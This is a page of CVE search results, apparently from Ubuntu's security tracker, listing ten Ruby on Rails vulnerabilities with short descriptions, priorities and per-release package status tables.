Search CVE reports

Toggle filters

61 – 70 of 150 results

CVE-2010-3299

Negligible priority
Ignored

The encrypt/decrypt functions in Ruby on Rails 2.3 are vulnerable to padding oracle attacks.

2 affected packages

rails, ruby-rails-2.3

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails
ruby-rails-2.3
Show less packages

CVE-2019-5420

Medium priority
Ignored

A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with...

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected
rails-4.0 Not in release
ruby-actionpack-3.2 Not in release
ruby-activemodel-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release
Show all 7 packages Show less packages

CVE-2019-5419

Medium priority
Vulnerable

There is a possible denial of service vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause action view to consume 100% cpu and make the server unresponsive.

7 affected packages

rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2, ruby-activesupport-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails-4.0 Not in release Not in release Not in release Not in release
ruby-actionpack-3.2 Not in release Not in release Not in release Not in release
ruby-activemodel-3.2 Not in release Not in release Not in release Not in release
ruby-activerecord-3.2 Not in release Not in release Not in release Not in release
ruby-activesupport-3.2 Not in release Not in release Not in release Not in release
rails Not affected Not affected Not affected Vulnerable
ruby-rails-3.2 Not in release Not in release Not in release Not in release
Show all 7 packages Show less packages

CVE-2019-5418

High priority

Some fixes available 2 of 4

There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected Not affected Not affected Fixed
rails-4.0 Not in release Not in release Not in release Not in release
ruby-actionpack-3.2 Not in release Not in release Not in release Not in release
ruby-activemodel-3.2 Not in release Not in release Not in release Not in release
ruby-activerecord-3.2 Not in release Not in release Not in release Not in release
ruby-rails-3.2 Not in release Not in release Not in release Not in release
ruby-activesupport-3.2 Not in release Not in release Not in release Not in release
Show all 7 packages Show less packages

CVE-2018-16477

Medium priority
Not affected

A bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allow an attacker to modify the `content-disposition` and `content-type` parameters which can be used in with HTML files and have them...

7 affected packages

rails-4.0, ruby-activemodel-3.2, rails, ruby-actionpack-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails-4.0 Not in release
ruby-activemodel-3.2 Not in release
rails Not affected
ruby-actionpack-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release
Show all 7 packages Show less packages

CVE-2018-16476

Medium priority
Vulnerable

A Broken Access Control vulnerability in Active Job versions >= 4.2.0 allows an attacker to craft user input which can cause Active Job to deserialize it using GlobalId and give them access to information that they should not...

7 affected packages

rails, ruby-rails-3.2, ruby-actionpack-3.2, ruby-activerecord-3.2, ruby-activesupport-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected Vulnerable Vulnerable Vulnerable
ruby-rails-3.2 Not in release Not in release Not in release Not in release
ruby-actionpack-3.2 Not in release Not in release Not in release Not in release
ruby-activerecord-3.2 Not in release Not in release Not in release Not in release
ruby-activesupport-3.2 Not in release Not in release Not in release Not in release
ruby-activemodel-3.2 Not in release Not in release Not in release Not in release
rails-4.0 Not in release Not in release Not in release Not in release
Show all 7 packages Show less packages

CVE-2018-3779

High priority
Ignored

active-support ruby gem 5.2.0 could allow a remote attacker to execute arbitrary code on the system, caused by containing a malicious backdoor. An attacker could exploit this vulnerability to execute arbitrary code on the system.

7 affected packages

rails, rails-4.0, ruby-actionpack-3.2, ruby-activemodel-3.2, ruby-activerecord-3.2...

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
rails Not affected
rails-4.0 Not in release
ruby-actionpack-3.2 Not in release
ruby-activemodel-3.2 Not in release
ruby-activerecord-3.2 Not in release
ruby-activesupport-3.2 Not in release
ruby-rails-3.2 Not in release
Show all 7 packages Show less packages

CVE-2016-10522

Medium priority
Vulnerable

rails_admin ruby gem <v1.1.1 is vulnerable to cross-site request forgery (CSRF) attacks. Non-GET methods were not validating CSRF tokens and, as a result, an attacker could hypothetically gain access to the...

1 affected package

ruby-rails-admin

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
ruby-rails-admin Not in release Not in release Not in release Vulnerable
Show less packages

CVE-2018-3741

Medium priority
Vulnerable

There is a possible XSS vulnerability in all rails-html-sanitizer gem versions below 1.0.4 for Ruby. The gem allows non-whitelisted attributes to be present in sanitized output when input with specially-crafted HTML fragments, and...

1 affected package

ruby-rails-html-sanitizer

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
ruby-rails-html-sanitizer Not affected Not affected Not affected Not affected
Show less packages

CVE-2017-12098

Medium priority
Vulnerable

An exploitable cross site scripting (XSS) vulnerability exists in the add filter functionality of the rails_admin rails gem version 1.2.0. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to...

1 affected package

ruby-rails-admin

Package 24.04 LTS 22.04 LTS 20.04 LTS 18.04 LTS
ruby-rails-admin Not in release Not in release Not in release Vulnerable
Show less packages
  1. Previous page
  2. 5
  3. 6
  4. 7
  5. 8
  6. 9
  7. Next page
Export to JSON